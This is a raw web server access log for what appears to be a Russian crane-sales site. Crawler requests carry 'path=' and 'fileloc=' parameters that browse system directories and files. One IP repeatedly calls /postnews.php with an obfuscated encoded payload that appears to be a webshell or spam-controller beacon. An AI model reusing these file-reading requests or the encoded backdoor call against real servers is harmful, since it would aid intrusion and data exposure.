216.73.216.53 - - [03/Nov/2025:04:40:03 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-192%2Fsanity_checks&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-192 HTTP/1.0" 200 12444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:37:13 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323233332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383633332q3133663333663534313431646130643261353335636662316466353034623938222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:40:08 +1000] "GET /1196704?path=//var/run/clamd.scan HTTP/1.0" 200 12771 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:40:15 +1000] "GET /1041472?path=//etc/xdg HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:40:20 +1000] "GET /1453808?path=//run/log HTTP/1.0" 200 14027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:37:36 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323235362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383635362q3663306664646234323734666537393433313831636563613630366164653035222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:40:31 +1000] "GET /1036224?fileloc=//usr/sbin/xfs_io&path=//usr/sbin HTTP/1.0" 200 192784 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:40:32 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fpie1.png&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 12780 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:40:37 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fodf6oti.png&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 15037 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
178.156.151.131 - - [03/Nov/2025:04:40:38 +1000] "GET /131964944?shopdetail=0131810172 HTTP/1.0" 200 60472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
74.7.227.14 - - [03/Nov/2025:04:40:39 +1000] "GET /1301040?path=//run/lvm HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:40:40 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fpie4.png&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 12757 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:40:43 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fodf6odt.png&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 14735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:40:46 +1000] "GET /1496512?path=//lib/gcc HTTP/1.0" 200 14075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:40:49 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fpie7.png&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 12786 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.240.195 - - [03/Nov/2025:04:40:50 +1000] "GET /1486259040?path=/home/region-gk.ru/data/www/new.region-gk.ru/.tmb HTTP/1.0" 200 14558 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [03/Nov/2025:04:40:52 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fbox1.png&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 12874 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:37:59 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323237392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383637392q3932306663636464393132623333353733643561316339313632363362626338222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:40:54 +1000] "GET /1248256?path=//var/lock HTTP/1.0" 200 18028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:40:55 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F1226%2Ftask%2F1226%2Fnet%2Fdev&path=%2F%2Fproc%2F1226%2Ftask%2F1226%2Fnet HTTP/1.0" 200 12927 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:41:01 +1000] "GET /1445840?fileloc=//var/log/yum.log-20230101&path=//var/log HTTP/1.0" 200 12316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:41:07 +1000] "GET /1452288?path=//etc/udev HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:38:23 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323330332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383730332q3263343763616631653163623733383365396134343936366362393565376434222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:41:16 +1000] "GET /1535392?path=//etc/yum HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:41:22 +1000] "GET /1424096?path=//run/udev HTTP/1.0" 200 19272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:41:29 +1000] "GET /1159376?path=//usr/etc HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:38:46 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323332362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383732362q3763353462383238373237396439393730643237663732323164316461343031222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:41:39 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdnotify_struct%2Fcpu_slabs&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdnotify_struct HTTP/1.0" 200 12449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:41:40 +1000] "GET /1200592?path=//etc/lvm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:41:40 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdnotify_struct%2Fslab_size&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdnotify_struct HTTP/1.0" 200 12449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:41:43 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fpid_namespace%2Faliases&path=%2F%2Fsys%2Fkernel%2Fslab%2Fpid_namespace HTTP/1.0" 200 12444 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:41:46 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-96%2Falloc_calls&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-96 HTTP/1.0" 200 12439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:41:49 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-96%2Fvalidate&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-96 HTTP/1.0" 200 12448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:41:51 +1000] "GET /1241808?path=//opt/zend HTTP/1.0" 200 28837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:41:52 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fpid_namespace%2Fdestroy_by_rcu&path=%2F%2Fsys%2Fkernel%2Fslab%2Fpid_namespace HTTP/1.0" 200 12451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:41:56 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fjbd2_inode%2Fcpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fjbd2_inode HTTP/1.0" 200 12439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:41:58 +1000] "GET /1143984?path=//usr/etc HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:39:09 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323334392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383734392q3764323436316133306436373930313864376261343037393863333363653664222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:42:05 +1000] "GET /1223696?path=//var/lock HTTP/1.0" 200 18028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.95.178 - - [03/Nov/2025:04:42:05 +1000] "GET /sitemap.xml HTTP/1.0" 200 173320 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [03/Nov/2025:04:42:10 +1000] "GET /1197584?path=//usr/sbin HTTP/1.0" 200 655955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:42:18 +1000] "GET /1518128?path=//usr/sbin HTTP/1.0" 200 655955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:39:32 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323337322p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383737322q3162376231383364613739653232646266626434643965363661356464633833222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:42:25 +1000] "GET /1390720?path=//usr/sbin HTTP/1.0" 200 655955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:42:30 +1000] "GET /1070304?path=//var/lock HTTP/1.0" 200 18028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:42:38 +1000] "GET /1198256?path=//etc/pki HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:42:44 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-96%2Fmin_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-96 HTTP/1.0" 200 12451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:42:44 +1000] "GET /1220064?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:39:55 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323339352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383739352q3235343764613232336536623362356264363037386565393037303439613631222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:42:49 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-4096%2Fobject_size&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-4096 HTTP/1.0" 200 12445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:42:52 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-96%2Fdestroy_by_rcu&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-96 HTTP/1.0" 200 12442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:42:55 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons%2Fball.gray.gif&path=%2F%2Fusr%2Fshare%2Fhttpd%2Ficons HTTP/1.0" 200 12748 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:42:56 +1000] "GET /1534192?path=//usr/lib HTTP/1.0" 200 57609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:42:58 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2FAcpi-ParseExt%2Fslab_size&path=%2F%2Fsys%2Fkernel%2Fslab%2FAcpi-ParseExt HTTP/1.0" 200 12446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:43:01 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-1024%2Fmin_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-1024 HTTP/1.0" 200 12445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:43:04 +1000] "GET /1364608?path=//usr/src HTTP/1.0" 200 15327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.141.79 - - [03/Nov/2025:04:43:08 +1000] "GET /2439124656?path=/home/region-gk.ru HTTP/1.0" 200 14069 "https://region-logist.ru/2439124656?shopdetail=2436249178" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
212.16.195.25 - - [03/Nov/2025:04:40:19 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323431392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383831392q3135393234353362663830633530666430653135303632306535396664623163222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:43:13 +1000] "GET /1518128?fileloc=//usr/sbin/semodule&path=//usr/sbin HTTP/1.0" 200 42969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:43:20 +1000] "GET /1518128?fileloc=//usr/sbin/mke2fs&path=//usr/sbin HTTP/1.0" 200 150240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:43:25 +1000] "GET / HTTP/1.0" 200 60472 "http://212.16.195.25" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
74.7.227.14 - - [03/Nov/2025:04:43:28 +1000] "GET /1197584?fileloc=//usr/sbin/thin_dump&path=//usr/sbin HTTP/1.0" 200 2076421 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:40:42 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323434322p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383834322q6536646465646466373366336439636537663563646132643364633937616564222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:43:38 +1000] "GET /1182448?path=//lib/grub HTTP/1.0" 200 14032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:43:41 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fmnt_cache%2Freclaim_account&path=%2F%2Fsys%2Fkernel%2Fslab%2Fmnt_cache HTTP/1.0" 200 12440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:43:45 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fnuma_policy%2Falign&path=%2F%2Fsys%2Fkernel%2Fslab%2Fnuma_policy HTTP/1.0" 200 12436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:43:46 +1000] "GET /1518128?fileloc=//usr/sbin/iprconfig&path=//usr/sbin HTTP/1.0" 200 617481 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:43:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fksm_rmap_item%2Fcpu_partial&path=%2F%2Fsys%2Fkernel%2Fslab%2Fksm_rmap_item HTTP/1.0" 200 12448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:43:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-8%2Fpoison&path=%2F%2Fsys%2Fkernel%2Fslab%2Fdma-kmalloc-8 HTTP/1.0" 200 12443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.244.166 - - [03/Nov/2025:04:43:53 +1000] "GET /?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-includes HTTP/1.0" 200 458675 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
74.7.227.14 - - [03/Nov/2025:04:43:55 +1000] "GET /1197584?fileloc=//usr/sbin/pwhistory_helper&path=//usr/sbin HTTP/1.0" 200 32884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:41:05 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323436352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383836352q3031343438653365323464666439623437313661643230396164316234306434222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [03/Nov/2025:04:44:03 +1000] "GET /1223664?path=//opt/zend HTTP/1.0" 200 28837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:44:11 +1000] "GET /1197584?fileloc=//usr/sbin/vgscan&path=//usr/sbin HTTP/1.0" 200 3198371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.14 - - [03/Nov/2025:04:44:20 +1000] "GET /1390720?fileloc=//usr/sbin/setpci&path=//usr/sbin HTTP/1.0" 200 42275 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:41:29 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131323438392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130383838392q3366326434353762396461656332316335633665643463613136613434623339222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
